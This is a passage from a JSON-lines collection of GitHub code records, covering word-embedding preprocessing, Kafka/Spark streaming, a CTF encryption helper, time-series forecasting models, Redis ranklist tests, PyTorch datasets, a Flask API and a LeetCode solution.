*\nimport gensim\nfrom nltk.stem import SnowballStemmer\n\nword2vec_path = base_dir + \"GoogleNews-vectors-negative300.bin.gz\"\nword2vec = gensim.models.KeyedVectors.load_word2vec_format(word2vec_path, binary=True)\n\nwith open(base_dir + 'GoogleNews-vectors-negative300-subset.txt', mode='w') as output_file:\n for word in vocab:\n if word in word2vec:\n vec = word2vec[word]\n word_and_vec = []\n word_and_vec.append(word)\n for num in vec:\n word_and_vec.append(num)\n word_and_vec_str = ' '.join(word_and_vec)\n output_file.write(word_and_vec_str + '\\n')","repo_name":"l294265421/toxic-comment-classification-challenge","sub_path":"data/google_news_vector_negtive200_subset.py","file_name":"google_news_vector_negtive200_subset.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17210667818","text":"\nimport os\nimport yaml\nimport markdown\nimport csv\nfrom itertools import combinations\n\nimport json \n\nimport datetime\n\nnode_list={}\nlang=[\"fr\",\"en\",\"pt\",\"es\"]\naut_keys=[\"authors\",\"reviewers\",\"editors\"]\ntl_keys=[\"translator\",\"translation-editor\",\"translation-reviewer\"]\ndict_lessons={}\nmd = markdown.Markdown(extensions = ['meta'])\npath=\"C:/Users/Celian/Desktop/PH_study/jekyll/\"\nfor l in lang:\n directory=path+l\n dd=[ f.path for f in os.scandir(directory) if f.is_dir() ]\n for d in dd:\n files=[ f.path for f in os.scandir(d) if f.is_file() and \".md\" in f.path ]\n for f_name in files:\n with open(f_name, \"r\", encoding='utf-8') as f:\n lines = f.read()\n html = md.convert(lines)\n meta=lines[lines.find(\"---\")+3:lines[lines.find(\"---\")+1:].find(\"---\")]\n dct = yaml.safe_load(meta)\n dct[\"lang\"]=l\n for k in dct.keys():\n if isinstance(dct[k], datetime.date):\n dct[k]=str(dct[k])\n print(dct[k])\n if(\"slug\" in dct.keys()):\n dict_lessons[dct[\"slug\"].lower().replace(\"\\n\",\"\").replace(\" \",\"-\")]=dct\n elif(\"redirect_from\" in dct.keys()):\n dict_lessons[dct[\"redirect_from\"].replace(\"/lessons/\",\"\").lower()]=dct\n else:\n dict_lessons[dct[\"title\"].lower().replace(\"\\n\",\"\").replace(\" \",\"-\")]=dct\n \n# file=\"C:/Users/Celian/Desktop/PH_DHnord/PH_analysis/data/dict_lessons_clean.json\"\n# with open(file, 'w') as outfile:\n# json.dump(dict_lessons, outfile)\n \nwith open(\"C:/Users/Celian/Desktop/PH_DHnord/PH_analysis/data/dict_lessons_clean.json\", 'rb') as f:\n dict_lessons = json.load(f) \nres_trad={\"fr\":{},\"en\":{},\"pt\":{},\"es\":{}}\nfor t in dict_lessons.keys():\n if(\"translation_date\" in dict_lessons[t].keys()):\n lang=dict_lessons[t][\"lang\"]\n try:\n orig=dict_lessons[t][\"original\"].lower().replace(\"\\n\",\"\").replace(\"_\",\"-\").replace(\" \",\"-\")\n if(orig==\"analisis-de-sentimientos-r\"):\n orig=\"analise-sentimento-R-syuzhet\".lower().replace(\"\\n\",\"\").replace(\"_\",\"-\").replace(\" \",\"-\")\n original_lang=dict_lessons[orig][\"lang\"]\n if(original_lang not in res_trad[lang].keys()):\n res_trad[lang][original_lang]=1\n else:\n res_trad[lang][original_lang]+=1\n except:\n print(dict_lessons[t][\"original\"])\n","repo_name":"datalogism/PH_analysis","sub_path":"python_scripts/create_dict_lessons.py","file_name":"create_dict_lessons.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3828531020","text":"from pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\nimport os\nimport sys\nimport json\n\nif __name__ == \"__main__\":\n os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.1.1 pyspark-shell'\n \n # Create Streaming Context and set batch interval\n conf = SparkConf().setMaster(\"local[*]\").setAppName(\"twitter-sentiment\")\n sc = SparkContext.getOrCreate(conf = conf)\n sc.setLogLevel(\"WARN\")\n sc.setCheckpointDir(\"./checkpoints\")\n ssc = StreamingContext(sc, 5)\n\n brokers = \"localhost:9092\"\n topic = [sys.argv[1]]\n kafkaParams = {\"metadata.broker.list\": \"localhost:9092\",\n \"zookeeper.connect\": \"localhost:2181\",\n \"group.id\": \"kafka-spark-streaming\",\n \"zookeeper.connection.timeout.ms\": \"1000\"}\n kafkaStream = KafkaUtils.createDirectStream(ssc, topic, kafkaParams)\n tweet = kafkaStream.map(lambda value: json.loads(value[1])). \\\n map(lambda json_object: (json_object[\"user\"][\"screen_name\"], json_object[\"text\"]))\n tweet.pprint()\n ssc.start()\n ssc.awaitTermination()\n \n \n \n \n \n# from pyspark import SparkContext, SparkConf\n# from pyspark.streaming import StreamingContext\n# from pyspark.streaming.kafka import KafkaUtils\n# import os\n# import sys\n\n# if __name__ == \"__main__\":\n# os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.1.1 pyspark-shell'\n \n\n \n\n\n# kafkaStream = KafkaUtils.createDirectStream(ssc, topic, kafkaParams)\n \n# raw = kafkaStream.flatMap(lambda kafkaS: [kafkaS])\n# print(raw)\n# print(type(raw))\n \n# # lines = kafkaStream.map(lambda x: x[1])\n# # lines.pprint()\n# # ssc.start()\n# # ssc.awaitTermination()\n \n# # lines = kvs.map(lambda x: x[1])\n# # counts = lines.flatMap(lambda line: line.split(\" \")) \\\n# # .map(lambda word: (word, 1)) \\\n# # .reduceByKey(lambda a, b: a+b)\n# # counts.pprint()\n# ssc.start()\n# ssc.awaitTermination()","repo_name":"fadhilmch/streaming-traffic-visualization","sub_path":"kafkaStreaming.py","file_name":"kafkaStreaming.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41621952401","text":"import os\nimport sys\nimport base64\nfrom cryptography.fernet import Fernet\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\n\nop = sys.argv[1]\nif op != \"encrypt\" and op != \"decrypt\":\n raise RuntimeError(f\"First argument must be 'encrypt' or 'decrypt', got {sys.argv}\")\n\nkey = [x.strip() for x in sys.argv[2:]]\n\nrotors = key[0:3]\nring_settings = key[3]\nplugboards = key[4:14]\nrotor_starts = key[14]\n\nfor i in range(len(plugboards)):\n if ord(plugboards[i][0]) > ord(plugboards[i][1]):\n plugboards[i] = plugboards[i][1] + plugboards[i][0]\nplugboards.sort()\n\nring_offset = ord(ring_settings[0]) - ord('A')\nring_settings = 'A' + ring_settings[1:]\n\nleft_rotor_start = chr(ord(rotor_starts[0]) - ring_offset)\nif ord(left_rotor_start) < ord('A'):\n left_rotor_start = chr(ord(left_rotor_start) + 26)\nrotor_starts = left_rotor_start + rotor_starts[1:]\n\nkey = rotors + [ring_settings] + plugboards + [rotor_starts]\n\nkey = b\" \".join(x.encode(\"utf-8\") for x in key)\n\nif op == \"encrypt\":\n salt = os.urandom(16)\nelse:\n salt = sys.stdin.buffer.read(16)\nkdf = PBKDF2HMAC(\n algorithm=hashes.SHA256(),\n length=32,\n salt=salt,\n iterations=390000,\n)\nkey = base64.urlsafe_b64encode(kdf.derive(key))\nf = Fernet(key)\n\nif op == \"encrypt\":\n plaintext = sys.stdin.buffer.read()\n ciphertext = f.encrypt(plaintext)\n sys.stdout.buffer.write(salt)\n sys.stdout.buffer.write(ciphertext)\nelse:\n ciphertext = sys.stdin.buffer.read()\n plaintext = f.decrypt(ciphertext)\n sys.stdout.buffer.write(plaintext)\n\n","repo_name":"google/google-ctf","sub_path":"2022/quals/crypto-enigma/encrypt_modern.py","file_name":"encrypt_modern.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":4153,"dataset":"github-code","pt":"77"} +{"seq_id":"17265565485","text":"from pmdarima import auto_arima\r\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\r\nimport pandas as pd\r\nfrom numpy import mean, std\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\nimport abc\r\nfrom datetime import date\r\nfrom fbprophet import Prophet\r\nimport numpy as np\r\nfrom scipy.optimize import minimize\r\n\r\nfrom evaluation import EvaluateModel\r\nfrom preprocessing import DataSplit\r\n\r\n\r\nclass TimeSeriesModel(object, metaclass=abc.ABCMeta):\r\n\r\n def __init__(self, df, train_size=.8):\r\n # Dividing into train and test set\r\n self.train, self.test = DataSplit(train_size).sequential_split(df)\r\n\r\n # Using abstract I oblige the implementation in the inheritance hierarchy\r\n @abc.abstractmethod\r\n def set_name(self):\r\n pass\r\n\r\n @abc.abstractmethod\r\n def fit(self, **params):\r\n pass\r\n\r\n @abc.abstractmethod\r\n def predict(self, **params):\r\n pass\r\n\r\n\r\nclass Exponential_Smoothing(TimeSeriesModel):\r\n\r\n def set_name(self):\r\n self.name = 'Exponential Smoothing'\r\n\r\n def fit(self, trend_effect='add', damped=True, seasonal_effect='add', seasonality=12, frequency='D',\r\n use_boxcox=True):\r\n\r\n self.trend = trend_effect\r\n self.damped = damped\r\n self.seasonal = seasonal_effect\r\n self.seasonality = seasonality\r\n self.frequency = frequency\r\n self.use_boxcox = use_boxcox\r\n\r\n self.fit = None\r\n\r\n if self.trend not in ['add', 'mult', None]:\r\n print('ERROR: Invalid value for trend effect! Allowed values are: add, mult or None')\r\n elif self.seasonal not in ['add', 'mult', None]:\r\n print('ERROR: Invalid value for trend effect! Allowed values are: add, mult or None')\r\n elif self.use_boxcox not in [True, False]:\r\n print('ERROR: Invalid value for use_boxcox! Allowed values are: True or False')\r\n elif self.seasonality < 0 or self.seasonality > self.train.shape[0]:\r\n print('ERROR: Invalid value for seasonality!')\r\n elif not isinstance(self.seasonality, int):\r\n print('ERROR: Seasonality must be an integer!')\r\n else:\r\n try:\r\n\r\n self.fit = ExponentialSmoothing(endog=self.train, trend=self.trend, damped_trend=self.damped,\r\n seasonal=self.seasonal, seasonal_periods=self.seasonality,\r\n initialization_method='legacy-heuristic', freq=self.frequency).fit()\r\n\r\n except:\r\n print('ERROR: Could not run exponential smoothing! Please check your input data. \\n')\r\n\r\n return self.fit\r\n\r\n def predict(self, start, end):\r\n\r\n self.start = start\r\n self.end = end\r\n self.forecast = None\r\n\r\n try:\r\n self.forecast = pd.DataFrame(self.fit.predict(self.start, self.end))\r\n except:\r\n print('ERROR: Could not forecast using Exponential Smoothing model this time series.')\r\n\r\n return self.forecast\r\n\r\n def fit_cv(self, trend_effect='add', damped=True, seasonal_effect='add', seasonality=12, frequency='D',\r\n use_boxcox=True, k=10):\r\n\r\n self.trend = trend_effect\r\n self.damped = damped\r\n self.seasonal = seasonal_effect\r\n self.seasonality = seasonality\r\n self.frequency = frequency\r\n self.use_boxcox = use_boxcox\r\n self.fit = None\r\n rmse_stats = []\r\n\r\n if self.trend not in ['add', 'mult', None]:\r\n print('ERROR: Invalid value for trend effect! Allowed values are: add, mult or None')\r\n elif self.seasonal not in ['add', 'mult', None]:\r\n print('ERROR: Invalid value for trend effect! Allowed values are: add, mult or None')\r\n elif self.use_boxcox not in [True, False]:\r\n print('ERROR: Invalid value for use_boxcox! Allowed values are: True or False')\r\n elif self.seasonality < 0 or self.seasonality > self.train.shape[0]:\r\n print('ERROR: Invalid value for seasonality!')\r\n elif not isinstance(self.seasonality, int):\r\n print('ERROR: Seasonality must be an integer!')\r\n else:\r\n\r\n self.forecast = None\r\n try:\r\n tscv = TimeSeriesSplit(n_splits=k)\r\n for train_index, test_index in tscv.split(self.train): # The split function returns only indexes\r\n train = self.train.iloc[train_index]\r\n test = self.train.iloc[test_index]\r\n self.start = test.index[0]\r\n self.end = test.index[-1]\r\n self.fit = ExponentialSmoothing(endog=train, trend=self.trend, damped_trend=self.damped,\r\n seasonal=self.seasonal, seasonal_periods=self.seasonality,\r\n initialization_method='legacy-heuristic', freq=self.frequency).fit()\r\n self.forecast = pd.DataFrame(self.fit.predict(self.start, self.end))\r\n rmse_stats.append(EvaluateModel(test, self.forecast).rmse())\r\n\r\n print(\"RSME for exponential smoothing computed using cross validation: %0.2f (+/- %0.2f)\" % (\r\n mean(rmse_stats), std(rmse_stats) * 2))\r\n\r\n # Select the best model considering the cross validation concept\r\n\r\n self.fit = ExponentialSmoothing(endog=self.train, trend=self.trend, damped_trend=self.damped,\r\n seasonal=self.seasonal, seasonal_periods=self.seasonality,\r\n initialization_method='legacy-heuristic', freq=self.frequency).fit()\r\n\r\n except:\r\n print('ERROR: Could not run exponential smoothing! Please check your input data. \\n') # ) + ex.message)\r\n return self.fit\r\n\r\n\r\nclass AutoArima(TimeSeriesModel):\r\n\r\n def set_name(self):\r\n self.name = 'ARIMA'\r\n\r\n def fit(self, seasonal, seasonality):\r\n\r\n self.seasonal = seasonal\r\n if not isinstance(seasonality, int):\r\n self.fit = None\r\n print('ERROR: Invalid value for seasonality')\r\n else:\r\n self.seasonality = seasonality\r\n self.fit = auto_arima(self.train, seasonal=self.seasonal, m=self.seasonality)\r\n\r\n return self.fit\r\n\r\n def predict(self, start, end):\r\n\r\n self.start = start\r\n self.end = end\r\n\r\n n = abs(self.end - self.start).days + 1\r\n self.forecast = None\r\n\r\n try:\r\n self.forecast = pd.DataFrame(self.fit.predict(n))\r\n self.forecast['Date'] = pd.date_range(start=self.start, end=self.end)\r\n self.forecast.set_index('Date', inplace=True)\r\n except:\r\n print('ERROR: Could not forecast using ARIMA model this time series.')\r\n\r\n return self.forecast\r\n\r\n\r\nclass FBProphet(TimeSeriesModel):\r\n\r\n def set_name(self):\r\n self.name = 'Prophet'\r\n\r\n def fit(self, growth='linear', yearly_seasonality='auto', weekly_seasonality='auto',\r\n daily_seasonality='auto', holidays=None, seasonality_mode='additive'):\r\n\r\n self.growth = growth\r\n self.yearly_seasonality = yearly_seasonality\r\n self.weekly_seasonality = weekly_seasonality\r\n self.daily_seasonality = daily_seasonality\r\n self.holidays = holidays\r\n self.seasonality_mode = seasonality_mode\r\n\r\n # Renaming columns for the standard of Prophet library\r\n self.train['ds'] = self.train.index\r\n self.train['y'] = self.train['Sales']\r\n\r\n self.model = Prophet(growth=self.growth, yearly_seasonality=self.yearly_seasonality,\r\n weekly_seasonality=self.yearly_seasonality, daily_seasonality=self.daily_seasonality,\r\n holidays=self.holidays, seasonality_mode=self.seasonality_mode)\r\n self.fit = self.model.fit(self.train)\r\n\r\n return self.fit\r\n\r\n def predict(self, start, end):\r\n\r\n self.start = start\r\n self.end = end\r\n\r\n n = abs(self.end - self.start).days + 1\r\n self.forecast = None\r\n\r\n try:\r\n self.forecast = self.model.make_future_dataframe(\r\n periods=n) # create the dataframe with the future timestamp\r\n forecast = self.model.predict(self.forecast) # runs the forecast\r\n self.forecast['Sales'] = forecast.yhat # save the forecast on the dataframe\r\n self.forecast.rename(columns={'ds': 'Date'}, inplace=True)\r\n self.forecast.set_index('Date', inplace=True)\r\n # The Prophet will do the forecast for the whole period, so we take only the predictions that represent the interval\r\n self.forecast = self.forecast[-n:]\r\n\r\n except:\r\n print('ERROR: Could not forecast using Prophet model this time series.')\r\n\r\n return self.forecast\r\n\r\n\r\nclass EnsembleModels(object):\r\n\r\n def set_name(self):\r\n self.name = 'Ensemble'\r\n\r\n def __init__(self, *models_list):\r\n\r\n self.models = list(models_list)\r\n\r\n def predict(self, start, end, mode='average'):\r\n\r\n self.start = start\r\n self.end = end\r\n self.mode = mode\r\n self.len = len(self.models)\r\n self.weights = np.zeros(self.len)\r\n self.weights.fill(1 / self.len)\r\n\r\n for idx, model in enumerate(self.models):\r\n if idx == 0:\r\n forecast = model.predict(start=self.start, end=self.end)\r\n else:\r\n forecast['model_' + str(idx)] = model.predict(start=self.start, end=self.end)\r\n\r\n if self.mode == 'average':\r\n\r\n self.forecast = (forecast * self.weights).sum(axis=1)\r\n elif self.mode == 'optimized':\r\n\r\n # Using as criteria the RSME to choose the best weights\r\n fun = lambda w: EvaluateModel(model.test, (forecast * w).sum(axis=1)).rmse() # objective function\r\n cons = ({'type': 'eq', 'fun': lambda w: w.sum() - 1}) # constraint\r\n res = minimize(fun, self.weights, method='SLSQP', constraints=cons)\r\n self.weights = res.x\r\n self.forecast = (forecast * self.weights).sum(axis=1)\r\n\r\n print('weights', self.weights)\r\n else:\r\n print('WARNING: Invalid mode for generating the ensemble')\r\n\r\n return self.forecast\r\n\r\n","repo_name":"fonseca-erika/Time-Series","sub_path":"Univariate Models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12230434246","text":"import unittest\nimport redis\nimport time\nimport random\n\nfrom landport.core.rank import RanklistBase as Ranklist\n\n\n# your data / maybe from mysql/redis/mongodb, but here we use python dict\n# instead!\nuser_info_data = {\n \"1002922\": \"frank\",\n \"1002923\": \"jack\",\n \"1002924\": \"pig\"\n}\nrank_prize_data = {\n \"1\": {\"name\": \"iPhone\"},\n \"2~3\": {\"name\": \"iPod\"}\n}\n\n# your plugin function declare here ...\n\n\ndef add_profit(d):\n p = d.get(\"prize\") - d.get(\"gold\")\n d.update({\"profit\": p})\n\n\ndef add_userinfotmation(d):\n uid = d.get(\"uid\")\n username = user_info_data.get(uid)\n d.update({\"username\": username})\n\n\nclass TestRanklistBase(unittest.TestCase):\n\n def setUp(self):\n self.redis_connect = redis.Redis(\"127.0.0.1\", 6379, 0)\n\n def test_1_ranklist_push_in(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n rk.push_in(user_1)\n expect_result = [{\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\"\n }, ]\n self.assertEqual(rk.top(), expect_result)\n\n expect_result = {\n \"1002922\": {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\"\n }\n }\n self.assertEqual(rk, expect_result)\n\n def test_2_ranklist_plugin(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n rk.plugin(add_profit)\n rk.plugin(add_userinfotmation)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n\n rk.push_in(user_1)\n\n expect_result = [{\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n }, ]\n self.assertEqual(rk.top(), expect_result)\n\n expect_result = {\n \"1002922\": {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n }\n }\n self.assertEqual(rk, expect_result)\n\n def test_3_ranklist_add_rank(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n rk.plugin(add_profit)\n rk.plugin(add_userinfotmation)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n\n rk.push_in(user_1)\n rk.sort_by(\"profit\").add_rank()\n\n expect_result = [{\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n \"rank\": \"1\",\n }, ]\n self.assertEqual(rk.top(), expect_result)\n\n expect_result = {\n \"1002922\": {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": \"1002922\",\n \"username\": \"frank\",\n \"profit\": 100,\n \"rank\": \"1\",\n }\n }\n self.assertEqual(rk, expect_result)\n\n def test_4_ranklist_add_gift(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n rk.plugin(add_profit)\n rk.plugin(add_userinfotmation)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n user_2 = {\n \"gold\": 220,\n \"prize\": 520,\n \"uid\": 1002923\n }\n user_3 = {\n \"gold\": 120,\n \"prize\": 320,\n \"uid\": 1002924\n }\n\n rk.push_in(user_1)\n rk.push_in(user_2)\n rk.push_in(user_3)\n rk.sort_by(\"profit\").add_rank().add_gift(rank_prize_data)\n\n expect_result = [\n {'username': 'jack',\n 'prize': 520,\n 'gold': 220,\n 'profit': 300,\n 'gift': {'name': 'iPhone'},\n 'rank': '1',\n 'uid': '1002923'\n },\n {'username': 'pig',\n 'prize': 320,\n 'gold': 120,\n 'profit': 200,\n 'gift': {'name': 'iPod'},\n 'rank': '2',\n 'uid': '1002924'\n }\n ]\n self.assertEqual(rk.top(2), expect_result)\n\n def test_5_ranklist_add_trend(self):\n redis_key = 'last_ranklist_cache:{}'.format(random.randint(1, 1000))\n rk = Ranklist(redis_key, self.redis_connect)\n rk.plugin(add_profit)\n\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n\n user_2 = {\n \"gold\": 120,\n \"prize\": 320,\n \"uid\": 1002924\n }\n rk.push_in(user_1)\n rk.push_in(user_2)\n\n expect_result = [\n {'trend': '1',\n 'prize': 320,\n 'gold': 120,\n 'profit': 200,\n 'rank': '1',\n 'uid': '1002924'\n },\n {'trend': '1',\n 'prize': 220,\n 'gold': 120,\n 'profit': 100,\n 'rank': '2',\n 'uid': '1002922'\n }\n ]\n rk.sort_by(\"profit\").add_rank().add_trend()\n self.assertEqual(rk.top(), expect_result)\n # after a while ...\n time.sleep(2)\n user_1 = {\n \"gold\": 220,\n \"prize\": 620,\n \"uid\": 1002922\n }\n user_2 = {\n \"gold\": 120,\n \"prize\": 320,\n \"uid\": 1002924\n }\n\n # simulator come in again ...\n print('redis key ={}'.format(redis_key))\n rk2 = Ranklist(redis_key, self.redis_connect)\n rk2.plugin(add_profit)\n rk2.push_in(user_1)\n rk2.push_in(user_2)\n expect_result = [\n {'trend': '1',\n 'prize': 620,\n 'gold': 220,\n 'profit': 400,\n 'rank': '1',\n 'uid': '1002922'\n },\n {'trend': '-1',\n 'prize': 320,\n 'gold': 120,\n 'profit': 200,\n 'rank': '2',\n 'uid': '1002924'\n }\n\n ]\n rk2.sort_by(\"profit\").add_rank().add_trend()\n self.assertEqual(rk2.top(), expect_result)\n\n def test_6_plugin_install(self):\n rk = Ranklist('last_ranklist_cache', self.redis_connect)\n user_1 = {\n \"gold\": 120,\n \"prize\": 220,\n \"uid\": 1002922\n }\n with self.assertRaises(RuntimeError):\n \trk.push_in(user_1)\n \trk.plugin(add_profit)\n\n\n def tearDown(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"land-pack/landport","sub_path":"tests/test_core_ranklist.py","file_name":"test_core_ranklist.py","file_ext":"py","file_size_in_byte":6666,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"24641273625","text":"from torch.utils.data import Dataset\nfrom PIL import Image\nfrom utils import data_utils\nimport torch\nfrom torchvision import transforms\nimport PIL\nimport numpy as np\n\nclass InferenceDataset(Dataset):\n\n\tdef __init__(self, root, opts, transform=None):\n\t\tself.paths = sorted(data_utils.make_dataset(root))\n\t\tself.transform = transform\n\t\tself.opts = opts\n\n\tdef __len__(self):\n\t\treturn len(self.paths)\n\n\tdef __getitem__(self, index):\n\t\tfrom_path = self.paths[index]\n\t\tfrom_im = Image.open(from_path)\n\t\tfrom_im = from_im.convert('RGB') if self.opts.label_nc == 0 else from_im.convert('L')\n\t\tif self.transform:\n\t\t\tfrom_im = self.transform(from_im)\n\t\treturn from_im\n\ndef ToTensor(pic):\n # handle PIL Image\n if pic.mode == 'I':\n img = torch.from_numpy(np.array(pic, np.int32, copy=False))\n elif pic.mode == 'I;16':\n img = torch.from_numpy(np.array(pic, np.int16, copy=False))\n else:\n img = torch.ByteTensor(torch.ByteStorage.from_buffer(pic.tobytes()))\n # PIL image mode: 1, L, P, I, F, RGB, YCbCr, RGBA, CMYK\n if pic.mode == 'YCbCr':\n nchannel = 3\n elif pic.mode == 'I;16':\n nchannel = 1\n else:\n nchannel = len(pic.mode)\n img = img.view(pic.size[1], pic.size[0], nchannel)\n # put it from HWC to CHW format\n # yikes, this transpose takes 80% of the loading time/CPU\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n if isinstance(img, torch.ByteTensor):\n return img.float()\n else:\n return img\n\t\t\nclass InferenceDataset_enc(Dataset):\n\n\tdef __init__(self, root_1, root_2, transform_1=None, transform_2=None, opts=None):\n\t\tself.paths_1 = sorted(data_utils.make_dataset(root_1))\n\t\tself.paths_2 = sorted(data_utils.make_dataset(root_2))\n\t\tself.transform_1 = transform_1\n\t\tself.transform_2 = transform_2\n\n\t\tself.opts = opts\n\n\tdef __len__(self):\n\t\treturn len(self.paths_1)\n\n\tdef __getitem__(self, index):\n\t\tfrom_path = self.paths_1[index]\n\t\tfrom_im = Image.open(from_path)\n\n\t\tfrom_im = from_im.convert('RGB') if self.opts.label_nc == 0 else from_im.convert('L')\n\n\t\tto_path = self.paths_2[index]\n\t\tto_im = Image.open(to_path).convert('RGB')\n\n\t\tif self.transform_1:\n\t\t\tfrom_im = self.transform_1(from_im)\n\t\tif self.transform_2:\n\t\t\tto_im = self.transform_2(to_im)\n\t\treturn from_im, to_im\n\n\n\n\n\n","repo_name":"zsl2018/StyleAnime","sub_path":"datasets/inference_dataset.py","file_name":"inference_dataset.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"79"} +{"seq_id":"33585720090","text":"def getserial():\n # Extract serial from cpuinfo file\n cpuserial = \"0000000000000000\"\n try:\n f = open('/proc/cpuinfo','r')\n for line in f:\n if line[0:6]=='Serial':\n cpuserial = line[10:26]\n f.close()\n except:\n cpuserial = \"ERROR000000000\"\n\n return cpuserial\n\nif __name__ == '__main__':\n serial = getserial()\n print(serial)","repo_name":"Team-Mask-On/Mask_On","sub_path":"rpi/get_serial_number.py","file_name":"get_serial_number.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"79"} +{"seq_id":"27858828356","text":"import flask\nfrom flask import request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom flask import json\n\nfrom salescanner.services.ad_item_service import AdItemService\n\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\nCORS(app)\n\n\n@app.route('/api', methods=['GET'])\ndef home():\n return jsonify({'msg': 'Hello to SaleScanner!'})\n\n\n@app.route('/api/ads/list', methods=['PUT'])\ndef get_ads():\n query = request.json.get('query', '')\n order_by = request.args.get('order_by')\n\n page = request.args.get('page')\n if page is not None:\n page = int(page)\n size = request.args.get('page_size')\n if size is not None:\n size = int(size)\n\n ads = AdItemService.list_ads(query, order_by, page, size)\n return jsonify(ads)\n\n\n@app.route('/api/ads/count', methods=['GET'])\n@cross_origin()\ndef count_ads():\n count = AdItemService.count_ads()\n return jsonify({'count': count})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', threaded=True)\n","repo_name":"ZdravkoHvarlingov/sale-scanner","sub_path":"salescanner/rest/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70839476736","text":"#\n# @lc app=leetcode.cn id=1991 lang=python3\n#\n# [1991] 找到数组的中间位置\n#\n# https://leetcode.cn/problems/find-the-middle-index-in-array/description/\n#\n# algorithms\n# Easy (64.86%)\n# Likes: 25\n# Dislikes: 0\n# Total Accepted: 14K\n# Total Submissions: 21.6K\n# Testcase Example: '[2,3,-1,8,4]'\n#\n# 给你一个下标从 0 开始的整数数组 nums ,请你找到 最左边 的中间位置 middleIndex (也就是所有可能中间位置下标最小的一个)。\n# \n# 中间位置 middleIndex 是满足 nums[0] + nums[1] + ... + nums[middleIndex-1] ==\n# nums[middleIndex+1] + nums[middleIndex+2] + ... + nums[nums.length-1] 的数组下标。\n# \n# 如果 middleIndex == 0 ,左边部分的和定义为 0 。类似的,如果 middleIndex == nums.length - 1\n# ,右边部分的和定义为 0 。\n# \n# 请你返回满足上述条件 最左边 的 middleIndex ,如果不存在这样的中间位置,请你返回 -1 。\n# \n# \n# \n# 示例 1:\n# \n# \n# 输入:nums = [2,3,-1,8,4]\n# 输出:3\n# 解释:\n# 下标 3 之前的数字和为:2 + 3 + -1 = 4\n# 下标 3 之后的数字和为:4 = 4\n# \n# \n# 示例 2:\n# \n# \n# 输入:nums = [1,-1,4]\n# 输出:2\n# 解释:\n# 下标 2 之前的数字和为:1 + -1 = 0\n# 下标 2 之后的数字和为:0\n# \n# \n# 示例 3:\n# \n# \n# 输入:nums = [2,5]\n# 输出:-1\n# 解释:\n# 不存在符合要求的 middleIndex 。\n# \n# \n# 示例 4:\n# \n# \n# 输入:nums = [1]\n# 输出:0\n# 解释:\n# 下标 0 之前的数字和为:0\n# 下标 0 之后的数字和为:0\n# \n# \n# \n# \n# 提示:\n# \n# \n# 1 <= nums.length <= 100\n# -1000 <= nums[i] <= 1000\n# \n# \n# \n# \n# 注意:本题与主站 724 题相同:https://leetcode-cn.com/problems/find-pivot-index/\n# \n#\n\n# @lc code=start\nclass Solution:\n # 294: 97.93%(28ms) 5.58%(15.1MB);\n def findMiddleIndex(self, nums: List[int]) -> int:\n size = len(nums)\n preSum = [0] * (size+1)\n for i in range(size):\n preSum[i+1] = preSum[i] + nums[i] # i+1的和包含i\n total = preSum[size]\n for i in range(size):\n if preSum[i] == total - preSum[i+1]: # 0..i-1 = i+1..size-1\n return i\n return -1\n# @lc 